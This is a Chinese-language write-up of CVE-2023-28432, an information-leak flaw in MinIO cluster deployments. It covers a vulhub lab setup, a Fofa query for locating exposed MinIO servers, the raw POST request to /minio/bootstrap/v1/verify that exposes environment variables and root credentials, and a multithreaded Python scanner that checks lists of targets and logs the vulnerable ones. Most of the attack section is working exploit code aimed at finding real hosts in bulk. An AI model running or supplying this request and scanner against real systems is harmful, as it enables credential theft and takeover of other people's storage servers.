MinIO集群模式信息泄露漏洞 CVE-2023-28432

1.漏洞描述&环境搭建

MinIO是一个开源对象存储系统。

在其RELEASE.2023-03-20T20-16-18Z版本（不含）以前，集群模式部署下存在一处信息泄露漏洞，攻击者可以通过发送一个POST数据包获取进程所有的环境变量，其中就包含账号密码MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD。

环境搭建：

下载vluhub项目，切换到CVE-2023-28432目录下，运行：

docker-compose up -d

集群启动后，访问http://localhost:9001可以查看Web管理页面，访问http://localhost:9000是API服务。

2.漏洞复现

影响范围：MinIO RELEASE.2019-12-17T23-16-33Z <= MinIO Version < MinIO RELEASE.2023-03-20T20-16-18Z

Fofa：banner="MinIO" || header="MinIO" || title="MinIO Browser"

这个漏洞存在于API节点http://10.211.55.2:9000/minio/bootstrap/v1/verify上，发送如下数据包即可查看泄露的环境变量：

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 10.211.55.2:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

可见，其中包含MINIO_ROOT_USER (accessKey)和MINIO_ROOT_PASSWORD (secretKey)。使用这个账号密码，即可成功登录管理后台：

MINIO_ROOT_USER minioadmin

MINIO_ROOT_PASSWORD minioadmin-vulhub

当然可以用相关的脚本进行测试：

import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
#app="minio"

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]

def get_ua():
  first_num = random.randint(55, 62)
  third_num = random.randint(0, 3200)
  fourth_num = random.randint(0, 140)
  os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
  ]
  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

  ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
           '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
          )
  return ua

proxies={'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080'}

def wirte_targets(vurl, filename):
  with open(filename, "a+") as f:
    f.write(vurl + "\n")

#poc
def check_url(url):
  url=parse.urlparse(url)
  hostname  = url.hostname
  url=url.scheme + '://' + url.netloc
  vulnurl=url + "/minio/bootstrap/v1/verify"
  headers = {
    'User-Agent': get_ua(),
    "host":hostname,
    "Content-Type": "application/x-www-form-urlencoded"
  }
  data=""
  try:
    res = requests.post(vulnurl, verify=False, allow_redirects=False, headers=headers,data=data ,timeout=5)
    if res.status_code == 200 and "MinioEn" in res.text:
      # print(res.text)
      print("\033[32m[+]{} is vulnerable\033[0m".format(url))
      wirte_targets(vulnurl,"vuln.txt")
    else:
      print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
  except Exception as e:
    print("\033[34m[!]{} request false.\033[0m".format(url))
    pass

#多线程
def multithreading(url_list, pools=5):
  works = []
  for i in url_list:
    # works.append((func_params, None))
    works.append(i)
  # print(works)
  pool = threadpool.ThreadPool(pools)
  reqs = threadpool.makeRequests(check_url, works)
  [pool.putRequest(req) for req in reqs]
  pool.wait()


if __name__ == '__main__':
  arg=ArgumentParser(description='check_url By m2')
  arg.add_argument("-u",
            "--url",
            help="Target URL; Example:http://ip:port")
  arg.add_argument("-f",
            "--file",
            help="Target URL; Example:url.txt")
  args=arg.parse_args()
  url=args.url
  filename=args.file
  print("[+]任务开始.....")
  start=time()
  if url != None and filename == None:
    check_url(url)
  elif url == None and filename != None:
    for i in open(filename):
      i=i.replace('\n','')
      url_list.append(i)
    multithreading(url_list,10)
  end=time()
  print('任务完成,用时%ds.' %(end-start))

3.修复建议

根据影响版本中的信息，排查并升级到安全版本，或直接访问参考链接获取官方更新指南。